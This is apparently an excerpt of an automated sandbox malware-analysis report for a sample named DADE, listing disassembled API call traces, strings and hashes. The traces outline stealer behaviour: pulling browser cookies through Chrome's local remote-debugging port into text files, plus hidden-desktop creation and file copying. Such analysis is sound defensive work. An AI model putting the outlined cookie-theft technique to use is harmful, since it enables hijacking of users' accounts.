                                                      • Instruction Fuzzy Hash: F0A15E71A002059BCB10AFB5DD89A9F77B9AF48304F44417AF905F72E1DB78DD018BA8
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E5E7C
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009E5EAB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E5EDC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F04
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009E5F0F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F37
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F6F
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009E5F7A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F9F
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E5FD5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E5FFD
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009E6008
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E602F
                                                      • lstrlen.KERNEL32(00431D64), ref: 009E6041
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E6060
                                                      • lstrcat.KERNEL32(00000000,00431D64), ref: 009E606C
                                                      • lstrlen.KERNEL32(00638DD8), ref: 009E607B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E609E
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009E60A9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E60D3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E60FF
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 009E6106
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E615E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E61CD
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E61FF
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E6242
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E626E
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E62A6
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E6318
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E633C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                                      • String ID:
                                                      • API String ID: 2428362635-0
                                                      • Opcode ID: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
                                                      • Instruction ID: 1a31d6f6cc3b4fb2692509f1dec9335ef602661935844461b8c882e19640e6ba
                                                      • Opcode Fuzzy Hash: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
                                                      • Instruction Fuzzy Hash: 5202A371A012959BCB22EF69CC89BAE7BF9EF94304F048529F805A7351DB74DD41CB90
                                                      APIs
                                                        • Part of subcall function 004090F0: InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
                                                        • Part of subcall function 004090F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
                                                        • Part of subcall function 004090F0: InternetCloseHandle.WININET(00000000), ref: 00409139
                                                        • Part of subcall function 004090F0: strlen.MSVCRT ref: 00409155
                                                      • strlen.MSVCRT ref: 00409311
                                                      • strlen.MSVCRT ref: 0040932A
                                                        • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
                                                        • Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
                                                        • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28
                                                        • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                      • memset.MSVCRT ref: 00409371
                                                      • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040938C
                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004093A2
                                                      • strlen.MSVCRT ref: 004093C9
                                                      • strlen.MSVCRT ref: 00409416
                                                      • memcmp.MSVCRT(?,0042D01C,?), ref: 0040943B
                                                      • memset.MSVCRT ref: 00409562
                                                      • lstrcatA.KERNEL32(?,cookies), ref: 00409577
                                                      • lstrcatA.KERNEL32(?,00431D64), ref: 00409589
                                                      • lstrcatA.KERNEL32(?,?), ref: 0040959A
                                                      • lstrcatA.KERNEL32(?,00435160), ref: 004095AC
                                                      • lstrcatA.KERNEL32(?,?), ref: 004095BD
                                                      • lstrcatA.KERNEL32(?,.txt), ref: 004095CF
                                                      • lstrlenA.KERNEL32(?), ref: 004095E6
                                                      • lstrlenA.KERNEL32(?), ref: 0040960B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00409644
                                                      • memset.MSVCRT ref: 0040968C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
                                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                                      • API String ID: 2819545660-3542011879
                                                      • Opcode ID: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
                                                      • Instruction ID: 864a5aaf990fcff81b4d6c55bfc79a47d2bf5be1f833ff5f37dcccbcd604048f
                                                      • Opcode Fuzzy Hash: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
                                                      • Instruction Fuzzy Hash: 3EE12671E00218EBDF14DFA8C984ADEBBB5AF48304F50447AE509B7291DB789E45CF98
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E49BA
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E49ED
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E4A15
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009E4A20
                                                      • lstrlen.KERNEL32(004352B8), ref: 009E4A2B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E4A48
                                                      • lstrcat.KERNEL32(00000000,004352B8), ref: 009E4A54
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E4A7D
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009E4A88
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E4AAF
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E4AEE
                                                      • lstrcat.KERNEL32(00000000,?), ref: 009E4AF6
                                                      • lstrlen.KERNEL32(00431D64), ref: 009E4B01
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E4B1E
                                                      • lstrcat.KERNEL32(00000000,00431D64), ref: 009E4B2A
                                                      • lstrlen.KERNEL32(004352CC), ref: 009E4B35
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E4B52
                                                      • lstrcat.KERNEL32(00000000,004352CC), ref: 009E4B5E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E4B85
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E4BB7
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 009E4BBE
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E4C18
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E4C41
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E4C6A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E4C92
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E4CC6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                                      • String ID:
                                                      • API String ID: 1033685851-0
                                                      • Opcode ID: 3860177a80801d667d4d5f47abfe203d36ef156e54d336ed77d13172b69f2413
                                                      • Instruction ID: a86d75d5823592ae4f3d8849a62f44338f0755fdde5b0203dcc4c18084ab413a
                                                      • Opcode Fuzzy Hash: 3860177a80801d667d4d5f47abfe203d36ef156e54d336ed77d13172b69f2413
                                                      • Instruction Fuzzy Hash: 91B1A070A412869BCB21AF75CD49BAE7BE9EF85304F14442AF805E7351DB78DC00DBA4
                                                      APIs
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 009F6680
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 009F6699
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 009F66B1
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 009F66C9
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 009F66E2
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 009F66FA
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 009F6712
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 009F672B
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 009F6743
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 009F675B
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 009F6774
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 009F678C
                                                        • Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 009F67A4
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F1E76
                                                      • GetUserDefaultLangID.KERNEL32 ref: 009F1E7C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$DefaultLangUserlstrcpy
                                                      • String ID:
                                                      • API String ID: 4154271814-0
                                                      • Opcode ID: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
                                                      • Instruction ID: 06869946417dc71e52af865a9a78a27ae0e904a05168bc7f63eb214f6f224392
                                                      • Opcode Fuzzy Hash: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
                                                      • Instruction Fuzzy Hash: C2616D3150020AEBDB21AFB4DC89B7E7BBAEF85745F145029FA05A7261DF749801DBA0
                                                      APIs
                                                      • lstrcat.KERNEL32(?,?), ref: 009D9A3F
                                                      • lstrcat.KERNEL32(?,?), ref: 009D9A54
                                                      • lstrcat.KERNEL32(?,0043516C), ref: 009D9A67
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
                                                        • Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0
                                                      • wsprintfA.USER32 ref: 009D9AAD
                                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 009D9AD0
                                                      • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 009D9AEF
                                                      • memset.MSVCRT ref: 009D9B0D
                                                      • lstrcat.KERNEL32(?,?), ref: 009D9B22
                                                      • lstrcat.KERNEL32(?,?), ref: 009D9B34
                                                      • lstrcat.KERNEL32(?,00435128), ref: 009D9B44
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009D9B81
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D9BB7
                                                      • StrStrA.SHLWAPI(?,00638C5C), ref: 009D9BCC
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009D9BE9
                                                      • lstrlen.KERNEL32(?), ref: 009D9BFD
                                                      • wsprintfA.USER32 ref: 009D9C0D
                                                      • lstrcpy.KERNEL32(?,?), ref: 009D9C24
                                                      • memset.MSVCRT ref: 009D9C3A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                                      • String ID: D
                                                      • API String ID: 171495903-2746444292
                                                      • Opcode ID: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
                                                      • Instruction ID: 4c9d8bb90545433a71179341248267f380d925bc918bea561a594dc8fb7c48cf
                                                      • Opcode Fuzzy Hash: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
                                                      • Instruction Fuzzy Hash: D89182B1644344AFD724EF64DC45FAB77E9EF88700F10891EF64987291DBB4A904CBA2
                                                      APIs
                                                      • lstrcat.KERNEL32(?,?), ref: 009D9A3F
                                                      • lstrcat.KERNEL32(?,?), ref: 009D9A54
                                                      • lstrcat.KERNEL32(?,0043516C), ref: 009D9A67
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
                                                        • Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0
                                                      • wsprintfA.USER32 ref: 009D9AAD
                                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 009D9AD0
                                                      • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 009D9AEF
                                                      • memset.MSVCRT ref: 009D9B0D
                                                      • lstrcat.KERNEL32(?,?), ref: 009D9B22
                                                      • lstrcat.KERNEL32(?,?), ref: 009D9B34
                                                      • lstrcat.KERNEL32(?,00435128), ref: 009D9B44
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009D9B81
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D9BB7
                                                      • StrStrA.SHLWAPI(?,00638C5C), ref: 009D9BCC
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009D9BE9
                                                      • lstrlen.KERNEL32(?), ref: 009D9BFD
                                                      • wsprintfA.USER32 ref: 009D9C0D
                                                      • lstrcpy.KERNEL32(?,?), ref: 009D9C24
                                                      • memset.MSVCRT ref: 009D9C3A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                                      • String ID: D
                                                      • API String ID: 171495903-2746444292
                                                      • Opcode ID: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
                                                      • Instruction ID: fa12d0eb8b071cb9db881bf6814f2349f0b0468f56f2e7ddca2c50d59e67ce8e
                                                      • Opcode Fuzzy Hash: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
                                                      • Instruction Fuzzy Hash: D69172B1644340AFD720EF64DC45FAB77E9EF88704F10891EF64987291DBB4A904CBA6
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
                                                      • lstrlenA.KERNEL32(00A543A8,00000000,00000000,?,?,00421B61), ref: 00421840
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
                                                      • lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
                                                      • lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
                                                      • lstrlenA.KERNEL32(00A543B8,?,?,00421B61), ref: 00421925
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0042194C
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421957
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421986
                                                      • lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 00421998
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004219B9
                                                      • lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004219C5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004219F4
                                                      • lstrlenA.KERNEL32(00A543C8,?,?,00421B61), ref: 00421A0A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A31
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421A3C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A6B
                                                      • lstrlenA.KERNEL32(00A76AD0,?,?,00421B61), ref: 00421A81
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AA8
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421AB3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AE2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1049500425-0
                                                      • Opcode ID: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
                                                      • Instruction ID: 274b4ab71ddff461c781089cdb5a89f9d7377c7fda2b54a99ae9043ae0fda87f
                                                      • Opcode Fuzzy Hash: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
                                                      • Instruction Fuzzy Hash: 84914CB57017039BD720AFB6DD88A17B7E9AF14344B54583EA881D33B1DBB8D841CBA4
                                                      APIs
                                                      • memset.MSVCRT ref: 009D12F1
                                                        • Part of subcall function 009D1267: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009D127C
                                                        • Part of subcall function 009D1267: RtlAllocateHeap.NTDLL(00000000), ref: 009D1283
                                                        • Part of subcall function 009D1267: RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 009D12A0
                                                        • Part of subcall function 009D1267: RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 009D12BA
                                                        • Part of subcall function 009D1267: RegCloseKey.ADVAPI32(?), ref: 009D12C4
                                                      • lstrcat.KERNEL32(?,00000000), ref: 009D1307
                                                      • lstrlen.KERNEL32(?), ref: 009D1314
                                                      • lstrcat.KERNEL32(?,00431D48), ref: 009D132F
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D1366
                                                      • lstrlen.KERNEL32(006389F0), ref: 009D1374
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D1398
                                                      • lstrcat.KERNEL32(00000000,006389F0), ref: 009D13A0
                                                      • lstrlen.KERNEL32(00431D50), ref: 009D13AB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D13CF
                                                      • lstrcat.KERNEL32(00000000,00431D50), ref: 009D13DB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1401
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D1446
                                                      • lstrlen.KERNEL32(00638CA4), ref: 009D1455
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D147C
                                                      • lstrcat.KERNEL32(00000000,?), ref: 009D1484
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D14BF
                                                      • lstrcat.KERNEL32(00000000), ref: 009D14CC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D14F3
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 009D151C
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D1548
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D1584
                                                        • Part of subcall function 009EF197: lstrcpy.KERNEL32(00000000,?), ref: 009EF1C9
                                                      • DeleteFileA.KERNEL32(?), ref: 009D15B8
                                                      • memset.MSVCRT ref: 009D15D5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
                                                      • String ID:
                                                      • API String ID: 1397529057-0
                                                      • Opcode ID: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
                                                      • Instruction ID: 1080cc61d5b6ff01554821d9d1a1ffb26e5898fa200731f973008a9086af4a0b
                                                      • Opcode Fuzzy Hash: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
                                                      • Instruction Fuzzy Hash: C4A15171A41245ABCB21AF74DC89FAEBBB9EF85304F048426F905A7351DB78DD01DBA0
                                                      APIs
                                                      • lstrcpy.KERNEL32 ref: 009EAE96
                                                      • lstrlen.KERNEL32(00638DD4), ref: 009EAEAC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EAED4
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009EAEDF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EAF08
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EAF4B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009EAF55
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EAF7E
                                                      • lstrlen.KERNEL32(0043509C), ref: 009EAF98
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EAFBA
                                                      • lstrcat.KERNEL32(00000000,0043509C), ref: 009EAFC6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EAFEF
                                                      • lstrlen.KERNEL32(0043509C), ref: 009EB001
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EB023
                                                      • lstrcat.KERNEL32(00000000,0043509C), ref: 009EB02F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EB058
                                                      • lstrlen.KERNEL32(00638DB8), ref: 009EB06E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EB096
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009EB0A1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EB0CA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EB106
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009EB110
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EB136
                                                      • lstrlen.KERNEL32(00000000), ref: 009EB14C
                                                      • lstrcpy.KERNEL32(00000000,00638A98), ref: 009EB17F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen
                                                      • String ID:
                                                      • API String ID: 2762123234-0
                                                      • Opcode ID: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
                                                      • Instruction ID: 839f1de2a460fe1d1fd9a9f969b4fb16117ea6911ae3b9aab21c34b7432bf184
                                                      • Opcode Fuzzy Hash: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
                                                      • Instruction Fuzzy Hash: 13B15E709016569BCB22AF65CC89BBF77BAFF81305F04452AF814A7261DB78ED00DB91
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F1A96
                                                      • lstrlen.KERNEL32(00638DEC), ref: 009F1AA7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1ACE
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009F1AD9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B08
                                                      • lstrlen.KERNEL32(00435564), ref: 009F1B1A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B3B
